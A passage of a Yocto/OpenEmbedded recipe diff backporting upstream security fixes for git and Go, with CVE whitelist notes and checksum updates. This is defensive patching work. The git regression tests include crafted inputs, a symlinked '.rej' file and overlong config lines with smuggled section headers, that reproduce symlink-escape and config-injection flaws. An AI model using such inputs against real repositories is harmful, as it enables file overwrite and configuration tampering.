++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: renamed-symlink/delete-me: No such file or directory
++ EOF
++ test_cmp expected_stderr stderr &&
++ test_path_is_file .git/delete-me
++'
++
+ test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-25652.patch b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
new file mode 100644
index 0000000000..d6b17a2b8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
@@ -0,0 +1,94 @@
+From 9db05711c98efc14f414d4c87135a34c13586e0b Mon Sep 17 00:00:00 2001
+From: Johannes Schindelin <johannes.schindelin@gmx.de>
+Date: Thu, 9 Mar 2023 16:02:54 +0100
+Subject: [PATCH] apply --reject: overwrite existing `.rej` symlink if it
+ exists
+
+The `git apply --reject` is expected to write out `.rej` files in case
+one or more hunks fail to apply cleanly. Historically, the command
+overwrites any existing `.rej` files. The idea being that
+apply/reject/edit cycles are relatively common, and the generated `.rej`
+files are not considered precious.
+
+But the command does not overwrite existing `.rej` symbolic links, and
+instead follows them. This is unsafe because the same patch could
+potentially create such a symbolic link and point at arbitrary paths
+outside the current worktree, and `git apply` would write the contents
+of the `.rej` file into that location.
+
+Therefore, let's make sure that any existing `.rej` file or symbolic
+link is removed before writing it.
+
+Reported-by: RyotaK <ryotak.mail@gmail.com>
+Helped-by: Taylor Blau <me@ttaylorr.com>
+Helped-by: Junio C Hamano <gitster@pobox.com>
+Helped-by: Linus Torvalds <torvalds@linuxfoundation.org>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/9db05711c98efc14f414d4c87135a34c13586e0b]
+CVE: CVE-2023-25652
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ apply.c | 14 ++++++++++++--
+ t/t4115-apply-symlink.sh | 15 +++++++++++++++
+ 2 files changed, 27 insertions(+), 2 deletions(-)
+
+diff --git a/apply.c b/apply.c
+index 4f303bf..aa7111d 100644
+--- a/apply.c
++++ b/apply.c
+@@ -4531,7 +4531,7 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
+ FILE *rej;
+ char namebuf[PATH_MAX];
+ struct fragment *frag;
+- int cnt = 0;
++ int fd, cnt = 0;
+ struct strbuf sb = STRBUF_INIT;
+
+ for (cnt = 0, frag = patch->fragments; frag; frag = frag->next) {
+@@ -4571,7 +4571,17 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
+ memcpy(namebuf, patch->new_name, cnt);
+ memcpy(namebuf + cnt, ".rej", 5);
+
+- rej = fopen(namebuf, "w");
++ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
++ if (fd < 0) {
++ if (errno != EEXIST)
++ return error_errno(_("cannot open %s"), namebuf);
++ if (unlink(namebuf))
++ return error_errno(_("cannot unlink '%s'"), namebuf);
++ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
++ if (fd < 0)
++ return error_errno(_("cannot open %s"), namebuf);
++ }
++ rej = fdopen(fd, "w");
+ if (!rej)
+ return error_errno(_("cannot open %s"), namebuf);
+
+diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
+index 1acb7b2..2b034ff 100755
+--- a/t/t4115-apply-symlink.sh
++++ b/t/t4115-apply-symlink.sh
+@@ -125,4 +125,19 @@ test_expect_success SYMLINKS 'symlink escape when deleting file' '
+ test_path_is_file .git/delete-me
+ '
+
++test_expect_success SYMLINKS '--reject removes .rej symlink if it exists' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++
++ test_commit file &&
++ echo modified >file.t &&
++ git diff -- file.t >patch &&
++ echo modified-again >file.t &&
++
++ ln -s foo file.t.rej &&
++ test_must_fail git apply patch --reject 2>err &&
++ test_i18ngrep "Rejected hunk" err &&
++ test_path_is_missing foo &&
++ test_path_is_file file.t.rej
++'
++
+ test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-29007.patch b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
new file mode 100644
index 0000000000..e166c01412
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
@@ -0,0 +1,159 @@
+From 057c07a7b1fae22fdeef26c243f4cfbe3afc90ce Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Fri, 14 Apr 2023 11:46:59 -0400
+Subject: [PATCH] Merge branch 'tb/config-copy-or-rename-in-file-injection'
+
+Avoids issues with renaming or deleting sections with long lines, where
+configuration values may be interpreted as sections, leading to
+configuration injection. Addresses CVE-2023-29007.
+
+* tb/config-copy-or-rename-in-file-injection:
+ config.c: disallow overly-long lines in `copy_or_rename_section_in_file()`
+ config.c: avoid integer truncation in `copy_or_rename_section_in_file()`
+ config: avoid fixed-sized buffer when renaming/deleting a section
+ t1300: demonstrate failure when renaming sections with long lines
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/528290f8c61222433a8cf02fb7cfffa8438432b4]
+CVE: CVE-2023-29007
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ config.c | 36 +++++++++++++++++++++++++-----------
+ t/t1300-config.sh | 30 ++++++++++++++++++++++++++++++
+ 2 files changed, 55 insertions(+), 11 deletions(-)
+
+diff --git a/config.c b/config.c
+index e7052b3..676b687 100644
+--- a/config.c
++++ b/config.c
+@@ -2987,9 +2987,10 @@ void git_config_set_multivar(const char *key, const char *value,
+ multi_replace);
+ }
+
+-static int section_name_match (const char *buf, const char *name)
++static size_t section_name_match (const char *buf, const char *name)
+ {
+- int i = 0, j = 0, dot = 0;
++ size_t i = 0, j = 0;
++ int dot = 0;
+ if (buf[i] != '[')
+ return 0;
+ for (i = 1; buf[i] && buf[i] != ']'; i++) {
+@@ -3042,6 +3043,8 @@ static int section_name_is_ok(const char *name)
+ return 1;
+ }
+
++#define GIT_CONFIG_MAX_LINE_LEN (512 * 1024)
++
+ /* if new_name == NULL, the section is removed instead */
+ static int git_config_copy_or_rename_section_in_file(const char *config_filename,
+ const char *old_name,
+@@ -3051,11 +3054,12 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ char *filename_buf = NULL;
+ struct lock_file lock = LOCK_INIT;
+ int out_fd;
+- char buf[1024];
++ struct strbuf buf = STRBUF_INIT;
+ FILE *config_file = NULL;
+ struct stat st;
+ struct strbuf copystr = STRBUF_INIT;
+ struct config_store_data store;
++ uint32_t line_nr = 0;
+
+ memset(&store, 0, sizeof(store));
+
+@@ -3092,16 +3096,25 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ goto out;
+ }
+
+- while (fgets(buf, sizeof(buf), config_file)) {
+- int i;
+- int length;
++ while (!strbuf_getwholeline(&buf, config_file, '\n')) {
++ size_t i, length;
+ int is_section = 0;
+- char *output = buf;
+- for (i = 0; buf[i] && isspace(buf[i]); i++)
++ char *output = buf.buf;
++
++ line_nr++;
++
++ if (buf.len >= GIT_CONFIG_MAX_LINE_LEN) {
++ ret = error(_("refusing to work with overly long line "
++ "in '%s' on line %"PRIuMAX),
++ config_filename, (uintmax_t)line_nr);
++ goto out;
++ }
++
++ for (i = 0; buf.buf[i] && isspace(buf.buf[i]); i++)
+ ; /* do nothing */
+- if (buf[i] == '[') {
++ if (buf.buf[i] == '[') {
+ /* it's a section */
+- int offset;
++ size_t offset;
+ is_section = 1;
+
+ /*
+@@ -3118,7 +3131,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ strbuf_reset(&copystr);
+ }
+
+- offset = section_name_match(&buf[i], old_name);
++ offset = section_name_match(&buf.buf[i], old_name);
+ if (offset > 0) {
+ ret++;
+ if (new_name == NULL) {
+@@ -3193,6 +3206,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ out_no_rollback:
+ free(filename_buf);
+ config_store_data_clear(&store);
++ strbuf_release(&buf);
+ return ret;
+ }
+
+diff --git a/t/t1300-config.sh b/t/t1300-config.sh
+index 983a0a1..9b67f6b 100755
+--- a/t/t1300-config.sh
++++ b/t/t1300-config.sh
+@@ -616,6 +616,36 @@ test_expect_success 'renaming to bogus section is rejected' '
+ test_must_fail git config --rename-section branch.zwei "bogus name"
+ '
+
++test_expect_success 'renaming a section with a long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %1024s [a] e = f\\n" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ git config -f y --rename-section a xyz &&
++ test_must_fail git config -f y b.e
++'
++
++test_expect_success 'renaming an embedded section with a long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %1024s [a] [foo] e = f\\n" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ git config -f y --rename-section a xyz &&
++ test_must_fail git config -f y foo.e
++'
++
++test_expect_success 'renaming a section with an overly-long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %525000s e" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ test_must_fail git config -f y --rename-section a xyz 2>err &&
++ test_i18ngrep "refusing to work with overly long line in .y. on line 2" err
++'
++
+ cat >> .git/config << EOF
+ [branch "zwei"] a = 1 [branch "vier"]
+ EOF
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/git.inc b/meta/recipes-devtools/git/git.inc
index 4131c98977..e64472ea28 100644
--- a/meta/recipes-devtools/git/git.inc
+++ b/meta/recipes-devtools/git/git.inc
@@ -1,5 +1,6 @@
SUMMARY = "Distributed version control system"
HOMEPAGE = "http://git-scm.com"
+DESCRIPTION = "Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency."
SECTION = "console/utils"
LICENSE = "GPLv2"
DEPENDS = "openssl curl zlib expat"
@@ -7,14 +8,44 @@ DEPENDS = "openssl curl zlib expat"
PROVIDES_append_class-native = " git-replacement-native"
SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
- ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
-
+ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \
+ file://fixsort.patch \
+ file://CVE-2021-40330.patch \
+ file://CVE-2022-23521.patch \
+ file://CVE-2022-41903-01.patch \
+ file://CVE-2022-41903-02.patch \
+ file://CVE-2022-41903-03.patch \
+ file://CVE-2022-41903-04.patch \
+ file://CVE-2022-41903-05.patch \
+ file://CVE-2022-41903-06.patch \
+ file://CVE-2022-41903-07.patch \
+ file://CVE-2022-41903-08.patch \
+ file://CVE-2022-41903-09.patch \
+ file://CVE-2022-41903-10.patch \
+ file://CVE-2022-41903-11.patch \
+ file://CVE-2022-41903-12.patch \
+ file://CVE-2023-22490-1.patch \
+ file://CVE-2023-22490-2.patch \
+ file://CVE-2023-22490-3.patch \
+ file://CVE-2023-23946.patch \
+ file://CVE-2023-29007.patch \
+ file://CVE-2023-25652.patch \
+ "
S = "${WORKDIR}/git-${PV}"
LIC_FILES_CHKSUM = "file://COPYING;md5=7c0d7ef03a7eb04ce795b0f60e68e7e1"
CVE_PRODUCT = "git-scm:git"
+# This is about a manpage not mentioning --mirror may "leak" information
+# in mirrored git repos. Most OE users wouldn't build the docs and
+# we don't see this as a major issue for our general users/usecases.
+CVE_CHECK_WHITELIST += "CVE-2022-24975"
+# This is specific to Git-for-Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41953"
+# specific to Git for Windows
+CVE_CHECK_WHITELIST += "CVE-2023-22743"
+
PACKAGECONFIG ??= ""
PACKAGECONFIG[cvsserver] = ""
PACKAGECONFIG[svn] = ""
diff --git a/meta/recipes-devtools/git/git/fixsort.patch b/meta/recipes-devtools/git/git/fixsort.patch
new file mode 100644
index 0000000000..eec1f84945
--- /dev/null
+++ b/meta/recipes-devtools/git/git/fixsort.patch
@@ -0,0 +1,36 @@
+[PATCH] generate-cmdlist.sh: Fix determinism issue
+
+Currently git binaries are not entirely reproducible, at least partly
+due to config-list.h differing in order depending on the system's
+locale settings. Under different locales, the entries:
+
+"sendemail.identity",
+"sendemail.<identity>.*",
+
+would differ in order for example and this leads to differences in
+the debug symbols for the binaries.
+
+This can be fixed by specifying the C locale for the sort in the
+shell script generating the header.
+
+Note: This is a backport of Richard Purdie's original patch for a more
+recent version of git. The offending code in this older version is
+in generate-cmdlist.sh. The upstream current version has this code
+in generate-configlist.sh.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u]
+
+index 71158f7..c137091 100755
+--- a/generate-cmdlist.sh
++++ b/generate-cmdlist.sh
+@@ -82,7 +82,7 @@ static const char *config_name_list[] = {
+ EOF
+ grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt |
+ sed '/deprecated/d; s/::$//; s/, */\n/g' |
+- sort |
++ LC_ALL=C sort |
+ while read line
+ do
+ echo " \"$line\","
diff --git a/meta/recipes-devtools/git/git_2.24.3.bb b/meta/recipes-devtools/git/git_2.24.4.bb
index ddd875f07b..f38c25f0ef 100644
--- a/meta/recipes-devtools/git/git_2.24.3.bb
+++ b/meta/recipes-devtools/git/git_2.24.4.bb
@@ -5,5 +5,5 @@ EXTRA_OECONF += "ac_cv_snprintf_returns_bogus=no \
"
EXTRA_OEMAKE += "NO_GETTEXT=1"
-SRC_URI[tarball.sha256sum] = "ef6d1d1de1d7921a54d23d07479bd2766f050d6435cea5d3b5322aa4897cb3d7"
-SRC_URI[manpages.sha256sum] = "325795ba33c0be02370de79636f32ad3b447665c1f2b5b4de65181fa804bed31"
+SRC_URI[tarball.sha256sum] = "6e119e70d3762f28e1dc9928c526eb4d7519fd3870f862775cd10186653eb85a"
+SRC_URI[manpages.sha256sum] = "e687bcc91a6fd9cb74243f91a9c2d77c50ce202a09b35931021ecc521a373ed5"
diff --git a/meta/recipes-devtools/glide/glide_0.13.3.bb b/meta/recipes-devtools/glide/glide_0.13.3.bb
index 31295edf90..21773d91f9 100644
--- a/meta/recipes-devtools/glide/glide_0.13.3.bb
+++ b/meta/recipes-devtools/glide/glide_0.13.3.bb
@@ -1,10 +1,11 @@
SUMMARY = "Vendor Package Management for Golang"
-HOMEPAGE = "https://glide.sh"
+HOMEPAGE = "https://github.com/Masterminds/glide"
+DESCRIPTION = "Glide is a Vendor Package Management for Golang"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2"
GO_IMPORT = "github.com/Masterminds/glide"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf"
inherit go
diff --git a/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
index 48b7e6d4a6..05cd6a1e63 100644
--- a/meta/recipes-devtools/gnu-config/gnu-config_git.bb
+++ b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "gnu-configize"
DESCRIPTION = "Tool that installs the GNU config.guess / config.sub into a directory tree"
+HOMEPAGE = "https://git.savannah.gnu.org/cgit/config.git"
SECTION = "devel"
LICENSE = "GPL-3.0-with-autoconf-exception"
LIC_FILES_CHKSUM = "file://config.guess;beginline=7;endline=27;md5=b75d42f59f706ea56d6a8e00216fca6a"
@@ -11,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1"
SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0"
PV = "20200117+git${SRCPV}"
-SRC_URI = "git://git.savannah.gnu.org/config.git \
+SRC_URI = "git://git.savannah.gnu.org/git/config.git;protocol=https;branch=master \
file://gnu-configize.in"
S = "${WORKDIR}/git"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-devtools/go/go-1.14.inc b/meta/recipes-devtools/go/go-1.14.inc
index 8f8ed89de8..9c7ceda891 100644
--- a/meta/recipes-devtools/go/go-1.14.inc
+++ b/meta/recipes-devtools/go/go-1.14.inc
@@ -1,7 +1,7 @@
require go-common.inc
GO_BASEVERSION = "1.14"
-GO_MINOR = ".7"
+GO_MINOR = ".15"
PV .= "${GO_MINOR}"
FILESEXTRAPATHS_prepend := "${FILE_DIRNAME}/go-${GO_BASEVERSION}:"
@@ -16,6 +16,112 @@ SRC_URI += "\
file://0006-cmd-dist-separate-host-and-target-builds.patch \
file://0007-cmd-go-make-GOROOT-precious-by-default.patch \
file://0008-use-GOBUILDMODE-to-set-buildmode.patch \
+ file://CVE-2021-34558.patch \
+ file://CVE-2021-33196.patch \
+ file://CVE-2021-33197.patch \
+ file://CVE-2021-38297.patch \
+ file://CVE-2022-23806.patch \
+ file://CVE-2022-23772.patch \
+ file://CVE-2021-44717.patch \
+ file://CVE-2022-24675.patch \
+ file://CVE-2021-31525.patch \
+ file://CVE-2022-30629.patch \
+ file://CVE-2022-30631.patch \
+ file://CVE-2022-30632.patch \
+ file://CVE-2022-30633.patch \
+ file://CVE-2022-30635.patch \
+ file://CVE-2022-32148.patch \
+ file://CVE-2022-32189.patch \
+ file://CVE-2021-27918.patch \
+ file://CVE-2021-36221.patch \
+ file://CVE-2021-39293.patch \
+ file://CVE-2021-41771.patch \
+ file://CVE-2022-27664.patch \
+ file://0001-CVE-2022-32190.patch \
+ file://0002-CVE-2022-32190.patch \
+ file://0003-CVE-2022-32190.patch \
+ file://0004-CVE-2022-32190.patch \
+ file://CVE-2022-2880.patch \
+ file://CVE-2022-2879.patch \
+ file://CVE-2021-33195.patch \
+ file://CVE-2021-33198.patch \
+ file://CVE-2021-44716.patch \
+ file://CVE-2022-24921.patch \
+ file://CVE-2022-28131.patch \
+ file://CVE-2022-28327.patch \
+ file://CVE-2022-41715.patch \
+ file://CVE-2022-41717.patch \
+ file://CVE-2022-1962.patch \
+ file://CVE-2022-41723.patch \
+ file://CVE-2022-41722-1.patch \
+ file://CVE-2022-41722-2.patch \
+ file://CVE-2020-29510.patch \
+ file://CVE-2023-24537.patch \
+ file://CVE-2023-24534.patch \
+ file://CVE-2023-24538-1.patch \
+ file://CVE-2023-24538-2.patch \
+ file://CVE-2023-24538_3.patch \
+ file://CVE-2023-24538_4.patch \
+ file://CVE-2023-24538_5.patch \
+ file://CVE-2023-24538_6.patch \
+ file://CVE-2023-24539.patch \
+ file://CVE-2023-24540.patch \
+ file://CVE-2023-29405-1.patch \
+ file://CVE-2023-29405-2.patch \
+ file://CVE-2023-29402.patch \
+ file://CVE-2023-29404.patch \
+ file://CVE-2023-29400.patch \
+ file://CVE-2023-29406-1.patch \
+ file://CVE-2023-29406-2.patch \
+ file://CVE-2023-29409.patch \
+ file://CVE-2022-41725-pre1.patch \
+ file://CVE-2022-41725-pre2.patch \
+ file://CVE-2022-41725-pre3.patch \
+ file://CVE-2022-41725.patch \
+ file://CVE-2023-24536_1.patch \
+ file://CVE-2023-24536_2.patch \
+ file://CVE-2023-24536_3.patch \
+ file://CVE-2023-39318.patch \
+ file://CVE-2023-39319.patch \
+ file://CVE-2023-39326.patch \
+ file://CVE-2023-45287-pre1.patch \
+ file://CVE-2023-45287-pre2.patch \
+ file://CVE-2023-45287-pre3.patch \
+ file://CVE-2023-45287.patch \
+ file://CVE-2023-45289.patch \
+ file://CVE-2023-45290.patch \
+ file://CVE-2024-24785.patch \
+ file://CVE-2024-24784.patch \
"
+
SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch"
-SRC_URI[main.sha256sum] = "064392433563660c73186991c0a315787688e7c38a561e26647686f89b6c30e3"
+SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149"
+
+# Upstream don't believe it is a signifiant real world issue and will only
+# fix in 1.17 onwards where we can drop this.
+# https://github.com/golang/go/issues/30999#issuecomment-910470358
+CVE_CHECK_WHITELIST += "CVE-2021-29923"
+
+# this issue affected go1.15 onwards
+# https://security-tracker.debian.org/tracker/CVE-2022-29526
+CVE_CHECK_WHITELIST += "CVE-2022-29526"
+
+# Issue only on windows
+CVE_CHECK_WHITELIST += "CVE-2022-29804"
+CVE_CHECK_WHITELIST += "CVE-2022-30580"
+CVE_CHECK_WHITELIST += "CVE-2022-30634"
+
+# Issue is in golang.org/x/net/html/parse.go, not used in go compiler
+CVE_CHECK_WHITELIST += "CVE-2021-33194"
+
+# Issue introduced in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2021-41772"
+
+# Fixes code that was added in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-30630"
+
+# This is specific to Microsoft Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41716"
+
+# Issue introduced in go1.15beta1, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-1705"
diff --git a/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
new file mode 100644
index 0000000000..ad263b8023
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
@@ -0,0 +1,74 @@
+From 755f2dc35a19e6806de3ecbf836fa06ad875c67a Mon Sep 17 00:00:00 2001
+From: Carl Johnson <me@carlmjohnson.net>
+Date: Fri, 4 Mar 2022 14:49:52 +0000
+Subject: [PATCH 1/4] net/url: add JoinPath, URL.JoinPath
+
+Builds on CL 332209.
+
+Fixes #47005
+
+Change-Id: I82708dede05d79a196ca63f5a4e7cb5ac9a041ea
+GitHub-Last-Rev: 51b735066eef74f5e67c3e8899c58f44c0383c61
+GitHub-Pull-Request: golang/go#50383
+Reviewed-on: https://go-review.googlesource.com/c/go/+/374654
+Reviewed-by: Russ Cox <rsc@golang.org>
+Auto-Submit: Russ Cox <rsc@golang.org>
+Trust: Ian Lance Taylor <iant@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/604140d93111f89911e17cb147dcf6a02d2700d0]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 23 +++++++++++++++++++++++
+ 1 file changed, 23 insertions(+)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 2880e82..dea8bfe 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -13,6 +13,7 @@ package url
+ import (
+ "errors"
+ "fmt"
++ "path"
+ "sort"
+ "strconv"
+ "strings"
+@@ -1104,6 +1105,17 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ return nil
+ }
+
++// JoinPath returns a new URL with the provided path elements joined to
++// any existing path and the resulting path cleaned of any ./ or ../ elements.
++func (u *URL) JoinPath(elem ...string) *URL {
++ url := *u
++ if len(elem) > 0 {
++ elem = append([]string{u.Path}, elem...)
++ url.setPath(path.Join(elem...))
++ }
++ return &url
++}
++
+ // validUserinfo reports whether s is a valid userinfo string per RFC 3986
+ // Section 3.2.1:
+ // userinfo = *( unreserved / pct-encoded / sub-delims / ":" )
+@@ -1144,3 +1156,14 @@ func stringContainsCTLByte(s string) bool {
+ }
+ return false
+ }
++
++// JoinPath returns a URL string with the provided path elements joined to
++// the existing path of base and the resulting path cleaned of any ./ or ../ elements.
++func JoinPath(base string, elem ...string) (result string, err error) {
++ url, err := Parse(base)
++ if err != nil {
++ return
++ }
++ result = url.JoinPath(elem...).String()
++ return
++}
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
new file mode 100644
index 0000000000..1a11cc72bc
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
@@ -0,0 +1,48 @@
+From 985108de87e7d2ecb2b28cb53b323d530387b884 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 31 Mar 2022 13:21:39 -0700
+Subject: [PATCH 2/4] net/url: preserve a trailing slash in JoinPath
+
+Fixes #52074
+
+Change-Id: I30897f32e70a6ca0c4e11aaf07088c27336efaba
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397256
+Trust: Ian Lance Taylor <iant@golang.org>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matt Layher <mdlayher@gmail.com>
+Trust: Matt Layher <mdlayher@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/dbb52cc9f3e83a3040f46c2ae7650c15ab342179]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index dea8bfe..3436707 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1107,11 +1107,18 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+
+ // JoinPath returns a new URL with the provided path elements joined to
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
++// Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+ url := *u
+ if len(elem) > 0 {
+ elem = append([]string{u.Path}, elem...)
+- url.setPath(path.Join(elem...))
++ p := path.Join(elem...)
++ // path.Join will remove any trailing slashes.
++ // Preserve at least one.
++ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++ p += "/"
++ }
++ url.setPath(p)
+ }
+ return &url
+ }
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
new file mode 100644
index 0000000000..816d914983
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
@@ -0,0 +1,36 @@
+From 2c632b883b0f11084cc247c8b50ad6c71fa7b447 Mon Sep 17 00:00:00 2001
+From: Sean Liao <sean@liao.dev>
+Date: Sat, 9 Jul 2022 18:38:45 +0100
+Subject: [PATCH 3/4] net/url: use EscapedPath for url.JoinPath
+
+Fixes #53763
+
+Change-Id: I08b53f159ebdce7907e8cc17316fd0c982363239
+Reviewed-on: https://go-review.googlesource.com/c/go/+/416774
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf5898ef53d1693aa572da0da746c05e9a6f15c5]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 3436707..73079a5 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1111,7 +1111,7 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ func (u *URL) JoinPath(elem ...string) *URL {
+ url := *u
+ if len(elem) > 0 {
+- elem = append([]string{u.Path}, elem...)
++ elem = append([]string{u.EscapedPath()}, elem...)
+ p := path.Join(elem...)
+ // path.Join will remove any trailing slashes.
+ // Preserve at least one.
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
new file mode 100644
index 0000000000..4bdff3aed4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
@@ -0,0 +1,82 @@
+From f61e428699cbb52bab31fe2c124f49d085a209fe Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 12 Aug 2022 16:21:09 -0700
+Subject: [PATCH 4/4] net/url: consistently remove ../ elements in JoinPath
+
+JoinPath would fail to remove relative elements from the start of
+the path when the first path element is "".
+
+In addition, JoinPath would return the original path unmodified
+when provided with no elements to join, violating the documented
+behavior of always cleaning the resulting path.
+
+Correct both these cases.
+
+ JoinPath("http://go.dev", "../go")
+ // before: http://go.dev/../go
+ // after: http://go.dev/go
+
+ JoinPath("http://go.dev/../go")
+ // before: http://go.dev/../go
+ // after: http://go.dev/go
+
+For #54385.
+Fixes #54635.
+Fixes CVE-2022-32190.
+
+Change-Id: I6d22cd160d097c50703dd96e4f453c6c118fd5d9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/423514
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Alan Donovan <adonovan@google.com>
+(cherry picked from commit 0765da5884adcc8b744979303a36a27092d8fc51)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/425357
+Run-TryBot: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/28335508913a46e05ef0c04a18e8a1a6beb775ec]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
